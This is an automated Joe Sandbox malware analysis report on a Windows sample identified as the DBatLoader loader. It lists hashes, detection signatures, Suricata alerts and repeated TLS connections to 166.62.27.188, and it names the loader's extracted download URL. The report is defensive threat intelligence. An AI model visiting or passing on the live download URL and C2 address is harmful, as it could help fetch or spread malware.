Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LbZ88q4uPa.exe

Overview

General Information

Sample name:LbZ88q4uPa.exe
renamed because original name is a hash value
Original sample name:bf9b75adf866583299dbc8a5fad66cfc.exe
Analysis ID:1590516
MD5:bf9b75adf866583299dbc8a5fad66cfc
SHA1:377f83f54d1226a181f265557804001cb9deee6a
SHA256:1bec44aa19ea8daa0b7151b312975f3f753e03f0bbce5ebeab8dfda5fb736a91
Tags:exeuser-abuse_ch
Infos:

Detection

DBatLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • LbZ88q4uPa.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\LbZ88q4uPa.exe" MD5: BF9B75ADF866583299DBC8A5FAD66CFC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2954365899.000000007FBB0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
    00000000.00000002.2938050052.0000000002296000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.LbZ88q4uPa.exe.22965a8.1.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
        0.2.LbZ88q4uPa.exe.2850000.2.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          0.2.LbZ88q4uPa.exe.22965a8.1.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:22:59.636291+010020283713Unknown Traffic192.168.2.449731166.62.27.188443TCP
            2025-01-14T08:23:01.167163+010020283713Unknown Traffic192.168.2.449733166.62.27.188443TCP
            2025-01-14T08:23:02.813843+010020283713Unknown Traffic192.168.2.449735166.62.27.188443TCP
            2025-01-14T08:23:04.488009+010020283713Unknown Traffic192.168.2.449737166.62.27.188443TCP
            2025-01-14T08:23:06.112840+010020283713Unknown Traffic192.168.2.449739166.62.27.188443TCP
            2025-01-14T08:23:07.733763+010020283713Unknown Traffic192.168.2.449741166.62.27.188443TCP
            2025-01-14T08:23:09.383947+010020283713Unknown Traffic192.168.2.449743166.62.27.188443TCP
            2025-01-14T08:23:11.014157+010020283713Unknown Traffic192.168.2.449745166.62.27.188443TCP
            2025-01-14T08:23:12.619106+010020283713Unknown Traffic192.168.2.449747166.62.27.188443TCP
            2025-01-14T08:23:14.247373+010020283713Unknown Traffic192.168.2.449749166.62.27.188443TCP
            2025-01-14T08:23:15.878852+010020283713Unknown Traffic192.168.2.449751166.62.27.188443TCP
            2025-01-14T08:23:17.483410+010020283713Unknown Traffic192.168.2.449754166.62.27.188443TCP
            2025-01-14T08:23:19.105707+010020283713Unknown Traffic192.168.2.449760166.62.27.188443TCP
            2025-01-14T08:23:20.741081+010020283713Unknown Traffic192.168.2.449763166.62.27.188443TCP
            2025-01-14T08:23:22.393223+010020283713Unknown Traffic192.168.2.449765166.62.27.188443TCP
            2025-01-14T08:23:23.995244+010020283713Unknown Traffic192.168.2.449767166.62.27.188443TCP
            2025-01-14T08:23:25.619767+010020283713Unknown Traffic192.168.2.449769166.62.27.188443TCP
            2025-01-14T08:23:27.268780+010020283713Unknown Traffic192.168.2.449771166.62.27.188443TCP
            2025-01-14T08:23:28.914870+010020283713Unknown Traffic192.168.2.449773166.62.27.188443TCP
            2025-01-14T08:23:30.570804+010020283713Unknown Traffic192.168.2.449775166.62.27.188443TCP
            2025-01-14T08:23:32.186581+010020283713Unknown Traffic192.168.2.449777166.62.27.188443TCP
            2025-01-14T08:23:33.822406+010020283713Unknown Traffic192.168.2.449779166.62.27.188443TCP
            2025-01-14T08:23:35.424446+010020283713Unknown Traffic192.168.2.449781166.62.27.188443TCP
            2025-01-14T08:23:37.077766+010020283713Unknown Traffic192.168.2.449783166.62.27.188443TCP
            2025-01-14T08:23:38.713940+010020283713Unknown Traffic192.168.2.449785166.62.27.188443TCP
            2025-01-14T08:23:40.474417+010020283713Unknown Traffic192.168.2.449787166.62.27.188443TCP
            2025-01-14T08:23:42.191342+010020283713Unknown Traffic192.168.2.449789166.62.27.188443TCP
            2025-01-14T08:23:43.829758+010020283713Unknown Traffic192.168.2.449791166.62.27.188443TCP
            2025-01-14T08:23:45.456082+010020283713Unknown Traffic192.168.2.449793166.62.27.188443TCP
            2025-01-14T08:23:47.062353+010020283713Unknown Traffic192.168.2.449795166.62.27.188443TCP
            2025-01-14T08:23:48.660247+010020283713Unknown Traffic192.168.2.449797166.62.27.188443TCP
            2025-01-14T08:23:50.280524+010020283713Unknown Traffic192.168.2.449799166.62.27.188443TCP
            2025-01-14T08:23:51.922767+010020283713Unknown Traffic192.168.2.449801166.62.27.188443TCP
            2025-01-14T08:23:53.556382+010020283713Unknown Traffic192.168.2.449803166.62.27.188443TCP
            2025-01-14T08:23:55.165928+010020283713Unknown Traffic192.168.2.449805166.62.27.188443TCP
            2025-01-14T08:23:56.747415+010020283713Unknown Traffic192.168.2.449808166.62.27.188443TCP
            2025-01-14T08:23:58.377559+010020283713Unknown Traffic192.168.2.449811166.62.27.188443TCP
            2025-01-14T08:24:00.013654+010020283713Unknown Traffic192.168.2.449818166.62.27.188443TCP
            2025-01-14T08:24:01.666961+010020283713Unknown Traffic192.168.2.449830166.62.27.188443TCP
            2025-01-14T08:24:03.454204+010020283713Unknown Traffic192.168.2.449846166.62.27.188443TCP
            2025-01-14T08:24:05.066971+010020283713Unknown Traffic192.168.2.449859166.62.27.188443TCP
            2025-01-14T08:24:06.690050+010020283713Unknown Traffic192.168.2.449871166.62.27.188443TCP
            2025-01-14T08:24:08.360097+010020283713Unknown Traffic192.168.2.449883166.62.27.188443TCP
            2025-01-14T08:24:10.096831+010020283713Unknown Traffic192.168.2.449895166.62.27.188443TCP
            2025-01-14T08:24:11.705347+010020283713Unknown Traffic192.168.2.449907166.62.27.188443TCP
            2025-01-14T08:24:13.288550+010020283713Unknown Traffic192.168.2.449919166.62.27.188443TCP
            2025-01-14T08:24:14.876986+010020283713Unknown Traffic192.168.2.449930166.62.27.188443TCP
            2025-01-14T08:24:16.470933+010020283713Unknown Traffic192.168.2.449942166.62.27.188443TCP
            2025-01-14T08:24:18.053865+010020283713Unknown Traffic192.168.2.449954166.62.27.188443TCP
            2025-01-14T08:24:19.638587+010020283713Unknown Traffic192.168.2.449967166.62.27.188443TCP
            2025-01-14T08:24:21.390415+010020283713Unknown Traffic192.168.2.449982166.62.27.188443TCP
            2025-01-14T08:24:22.975306+010020283713Unknown Traffic192.168.2.449992166.62.27.188443TCP
            2025-01-14T08:24:24.572059+010020283713Unknown Traffic192.168.2.450004166.62.27.188443TCP
            2025-01-14T08:24:26.184511+010020283713Unknown Traffic192.168.2.450016166.62.27.188443TCP
            2025-01-14T08:24:27.810360+010020283713Unknown Traffic192.168.2.450028166.62.27.188443TCP
            2025-01-14T08:24:29.395592+010020283713Unknown Traffic192.168.2.450038166.62.27.188443TCP
            2025-01-14T08:24:31.000833+010020283713Unknown Traffic192.168.2.450050166.62.27.188443TCP
            2025-01-14T08:24:32.797140+010020283713Unknown Traffic192.168.2.450061166.62.27.188443TCP
            2025-01-14T08:24:34.394719+010020283713Unknown Traffic192.168.2.450073166.62.27.188443TCP
            2025-01-14T08:24:35.989680+010020283713Unknown Traffic192.168.2.450087166.62.27.188443TCP
            2025-01-14T08:24:37.609406+010020283713Unknown Traffic192.168.2.450099166.62.27.188443TCP
            2025-01-14T08:24:39.409907+010020283713Unknown Traffic192.168.2.450112166.62.27.188443TCP
            2025-01-14T08:24:41.055359+010020283713Unknown Traffic192.168.2.450124166.62.27.188443TCP
            2025-01-14T08:24:42.806841+010020283713Unknown Traffic192.168.2.450129166.62.27.188443TCP
            2025-01-14T08:24:44.404774+010020283713Unknown Traffic192.168.2.450131166.62.27.188443TCP
            2025-01-14T08:24:46.721262+010020283713Unknown Traffic192.168.2.450133166.62.27.188443TCP
            2025-01-14T08:24:48.303889+010020283713Unknown Traffic192.168.2.450135166.62.27.188443TCP
            2025-01-14T08:24:49.896063+010020283713Unknown Traffic192.168.2.450137166.62.27.188443TCP
            2025-01-14T08:24:51.499235+010020283713Unknown Traffic192.168.2.450139166.62.27.188443TCP
            2025-01-14T08:24:53.082164+010020283713Unknown Traffic192.168.2.450141166.62.27.188443TCP
            2025-01-14T08:24:54.782093+010020283713Unknown Traffic192.168.2.450143166.62.27.188443TCP
            2025-01-14T08:24:56.382168+010020283713Unknown Traffic192.168.2.450145166.62.27.188443TCP
            2025-01-14T08:24:58.007807+010020283713Unknown Traffic192.168.2.450147166.62.27.188443TCP
            2025-01-14T08:24:59.617140+010020283713Unknown Traffic192.168.2.450149166.62.27.188443TCP
            2025-01-14T08:25:01.343332+010020283713Unknown Traffic192.168.2.450151166.62.27.188443TCP
            2025-01-14T08:25:02.976140+010020283713Unknown Traffic192.168.2.450153166.62.27.188443TCP
            2025-01-14T08:25:04.590604+010020283713Unknown Traffic192.168.2.450155166.62.27.188443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: LbZ88q4uPa.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://amazonenviro.com/245_Nsltarpncon"]}
            Multi AV Scanner detection for submitted file
            Source: LbZ88q4uPa.exeVirustotal: Detection: 81%Perma Link
            Source: LbZ88q4uPa.exeReversingLabs: Detection: 76%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
            Source: LbZ88q4uPa.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49739 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49754 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49763 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49767 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49769 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49775 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49777 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49779 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49781 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49783 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49787 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49789 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49791 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49793 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49795 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49797 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49799 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49801 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49805 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49808 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49811 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49818 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49830 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49846 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49859 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49871 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49883 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49895 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49907 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49919 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49930 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49942 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49954 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49967 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49982 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:49992 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50004 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50016 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50028 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50038 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50050 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50061 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50073 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50087 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50099 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50112 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50124 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50129 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50131 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50133 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50135 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50137 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50139 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50141 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50143 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50145 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50147 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50149 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50151 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50153 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 166.62.27.188:443 -> 192.168.2.4:50155 version: TLS 1.2
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_028558B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028558B4

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://amazonenviro.com/245_Nsltarpncon
            Source: C:\Users\user\Desktop\LbZ88q4uPa.exeCode function: 0_2_0286E72C InternetCheckConnectionA,0_2_0286E72C
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49767 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49769 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49779 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49795 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49799 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49763 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49791 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49771 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49783 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49797 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49803 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49846 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49789 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49760 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49818 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49777 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49805 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49765 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49895 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49773 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49808 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49859 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49830 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49930 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49871 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49942 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49907 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49954 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49967 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49982 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50004 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49787 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49811 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49883 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50038 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50028 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49793 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50073 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50087 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50099 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49754 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50112 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50061 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50135 -> 166.62.27.188:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50141 -> 166.62.27.188:443
